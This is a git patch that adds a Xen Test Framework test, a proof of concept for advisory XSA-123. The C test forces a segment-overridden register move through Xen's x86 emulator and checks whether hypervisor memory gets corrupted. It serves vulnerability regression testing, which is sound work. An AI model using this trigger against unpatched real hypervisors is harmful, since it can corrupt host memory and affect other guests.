From 4fc1e54ed1c8c1caf21302d24e7268802bae2498 Mon Sep 17 00:00:00 2001
From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Fri, 15 Jan 2016 15:44:58 +0000
Subject: [PATCH] XSA-123 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---
 docs/all-tests.dox     |  2 ++
 tests/xsa-123/Makefile | 11 ++++++++
 tests/xsa-123/main.c   | 62 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 75 insertions(+)
 create mode 100644 tests/xsa-123/Makefile
 create mode 100644 tests/xsa-123/main.c

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index dae450d..08c5628 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -26,6 +26,8 @@ Coveres XSA-106 and XSA-156.
 
 @subpage test-xsa-122 - Hypervisor stack leak via xen_version() hypercall.
 
+@subpage test-xsa-123 - Hypervisor memory corruption due to x86 emulator flaw.
+
 @subpage test-xsa-167 - PV superpage sanity checks.
 
 @subpage test-xsa-168 - `INVVPID` non-canonical guest address.
diff --git a/tests/xsa-123/Makefile b/tests/xsa-123/Makefile
new file mode 100644
index 0000000..a4cd342
--- /dev/null
+++ b/tests/xsa-123/Makefile
@@ -0,0 +1,11 @@
+ROOT := $(abspath $(CURDIR)/../..)
+
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-123
+CATEGORY  := xsa
+TEST-ENVS := hvm32
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-123/main.c b/tests/xsa-123/main.c
new file mode 100644
index 0000000..67479b5
--- /dev/null
+++ b/tests/xsa-123/main.c
@@ -0,0 +1,62 @@
+/**
+ * @file tests/xsa-123/main.c
+ * @ref test-xsa-123
+ *
+ * @page test-xsa-123 XSA-123
+ *
+ * Advisory: [XSA-123](http://xenbits.xen.org/xsa/advisory-123.html)
+ *
+ * An x86 instruction destination operand is either a memory reference or a
+ * register.  Memory references always have an associated selector, and
+ * typically default to %%ds if not specified.  The selector is not relevant
+ * however for a destination register operand.
+ *
+ * Before XSA-122, an enumeration representing an explicit segment override on
+ * a register destination instruction wasn't dropped, and would be stashed in
+ * a union, aliasing the lower half of a pointer into the register block on
+ * the stack.
+ *
+ * Register-destination instructions don't usually trap for emulation, and
+ * explicit segment overrides are rare in general.  Compilers also make it
+ * hard to accidentally have a segment override for a register-destination
+ * instruction.
+ *
+ * This test explicitly forces a `%%cs:mov %%reg, %%reg` instruction through
+ * the x86 instruction emulator.  If the destination register doesn't match
+ * the source register, hypervisor memory corruption has occurred.
+ *
+ * @sa tests/xsa-123/main.c
+ */
+#include <xtf/lib.h>
+
+void test_main(void)
+{
+    unsigned long src = 0x1234, dest = 0;
+
+    printk("XSA-123 PoC\n");
+
+    if ( !xtf_has_fep )
+        return xtf_error("Error: FEP not available\n");
+
+    asm volatile(_ASM_XEN_FEP
+                 /* Explicit %cs segment override. */
+                 ".byte 0x2e;"
+                 "mov %k[src], %k[dest]"
+                 : [src] "=r" (src), [dest] "=r" (dest)
+                 : "0" (src), "1" (dest));
+
+    if ( dest != 0x1234 )
+        xtf_failure("  '%%cs:mov %%reg, %%reg' clobbered hypervisor memory\n");
+    else
+        xtf_success("  '%%cs:mov %%reg, %%reg' was emulated correctly\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
-- 
2.39.5